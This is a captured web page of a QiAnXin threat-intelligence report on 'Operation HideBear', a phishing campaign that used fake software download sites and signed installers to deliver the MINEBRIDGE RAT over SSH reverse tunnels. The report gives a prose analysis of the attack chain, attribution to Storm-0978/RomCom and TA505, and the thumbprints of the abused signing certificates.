ti.qianxin.com Open in urlscan Pro
103.114.158.137  Public Scan

Form analysis
0 forms found in the DOM

Text Content

返回 TI 主页

RESEARCH

数 据 驱 动 安 全

Operation HideBear: Russian Threat Actors Targeting East Asia and North America

2023-10-16 By 红雨滴团队 | 事件追踪

PDF IOC


OVERVIEW

QiAnXin Threat Intelligence Center observed an unknown threat actor group
towards the end of 2022. They were impersonating some common software download
pages and buying Google search ranking to deploy these fake websites ahead of
official websites. Their aim was to induce victims into downloading installation
packages that had unofficial but valid signatures, repackaged using Inno Setup.



Due to the complexity of their attack chain and the need for manual operations
by the attackers, the final payload remained elusive. This made it difficult to
attribute the attacks until mid-2023 when we noticed the delivery of
TeamViewer's DLL Sideloading component via SFTP to compromised endpoints in East
Asia and North America. This activity led us to believe that this group was
related to the attacks against security researchers disclosed by Zscaler
ThreatLab in 2021 [1].

The phishing activity timeline for this group in the past year is as follows:





ATTACK CHAIN

The attack chain for Operation HideBear's recent phishing activity is as
follows:



The focus of the entire execution chain is on SSH reverse tunnels. Since OpenSSH
is a legitimate white file, it's relatively easy to bypass EDR endpoint
detections. In the end, the attackers used sftp-server.exe to deliver the
TeamViewer hijacking component to the victim's machine. After analyzing the
sample obfuscated with Themida, we discovered it was the MINEBRIDGE RAT.
Furthermore, we found the use of AnyDesk and an attempt to propagate laterally
using PsExec. During the decryption of keys, the attackers utilized the
[System.Security.Cryptography.ProtectedData]::Unprotect function, indicating
that data decryption can only be performed within the victim machine's user
context.



In this phishing campaign, four legitimate signatures were used. Some of these
signatures were still valid as of the completion of the report. Further analysis
found that the group had also employed the Amadey commercial Trojan, although
its purpose remained unknown.

- - Thumbprint Signature FC2BDF5BD23470669F63B9A5BAE6305160DCBC67 GUTON LLC
A05536924F1BA8F99BA6B1AA3C97B809E32A477E NTB CONSULTING SERVICES INC.
A1C753F5271F24B8067AC864BB4192C37265840C OOO RIMMA
9A865A28A85CABC3F79C88BE54AF3B20962BC35C KATEN LLC

We have also discovered the latest variant of MINEBRIDGE RAT. The sample appears
to have undergone obfuscation via LLVM, removing some older C&C instructions.
Upon execution, it retrieves a DLL from the C&C server and loads it into memory.
The primary function of this DLL is to create a pipeline for executing
PowerShell commands delivered by the C&C server, and the executed PowerShell
scripts are consistent with the scripts used for downloading the SSH component
as mentioned above.



ATTRIBUTION AND IMPACT

The registration times of the front domains accessed in the Inno Setup
installation packages suggest that the group has been active since 2021.
However, during this time, there were very few reports in the OSINT community
about MINEBRIDGE. In this vacuum, the attackers' activities seemed to be
challenging to trace. We discovered several built-in domains in MINEBRIDGE,
including one with a CN ending. Some of these domains have expired. Historical
resolution records indicate that they once used Cloudflare CDN nodes to conceal
their real IP between 2021 and 2022.

- - Start Time for CDN Node Resolution End Time for CDN Node Resolution
2021-10-01 2022-09-01 2021-09-04 2022-09-03 2021-10-01 2022-04-24

Based on the data rolled back by QiAnXin's big data, we found that during the
period when malicious domains resolved to Cloudflare CDN nodes, there was
communication with the domains from corporate dedicated lines and home broadband
in mainland China. The enterprises involved were in sectors like cryptocurrency,
electronic components, technology, investment, and healthcare.



Operation HideBear's infrastructure distribution is as follows:



This implies that MINEBRIDGE's activities are not solely economically motivated,
but there is also an objective of stealing electronic information technology and
medical technology. Mandiant first disclosed [2] MINEBRIDGE in 2020, mentioning
that it might be a subset of TA505 or an entirely new group. Subsequent reports
from other vendors have attributed it to TA505. From the information we
currently have, it seems more likely that MINEBRIDGE is operated by a new threat
group. This threat group has been disclosed by Microsoft Threat Intelligence
Center as Storm-0978 (RomCom) [3]. The phishing techniques used in Operation
HideBear are similar to those used by Storm-0978. Both activities involve the
forgery of the Advanced IP Scanner installer package. More importantly, we found
that the Operation HideBear campaign and Storm-0978 (RomCom) used an identical
framework to create the fake websites. Hence, we have medium to high confidence
that Storm-0978 (RomCom), TA505, and MINEBRIDGE have deep connections.



SUMMARY

Currently, all products of QiAnXin Threat Intelligence Center, including QiAnXin
Threat Intelligence Platform (TIP), Tianqing, Tianyan Advanced Threat Detection
System, QiAnXin NGSOC, and QiAnXin Situational Awareness, support accurate
detection of such attacks.





IOC

For detailed indicators of compromise (IOCs) related to this organization,
please contact QiAnXin Threat Intelligence Center at ti.qianxin.com.



REFERENCE LINKS

[1].https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures

[2].https://www.mandiant.com/resources/blog/stomp-2-dis-brilliance-in-the-visual-basics

[3].https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/

OPERATION HIDEBEAR PHISHING CAMPAIGNS
分享到：
首页
Operation HideBear: Russian Threat Actors Targeting East Asia and North America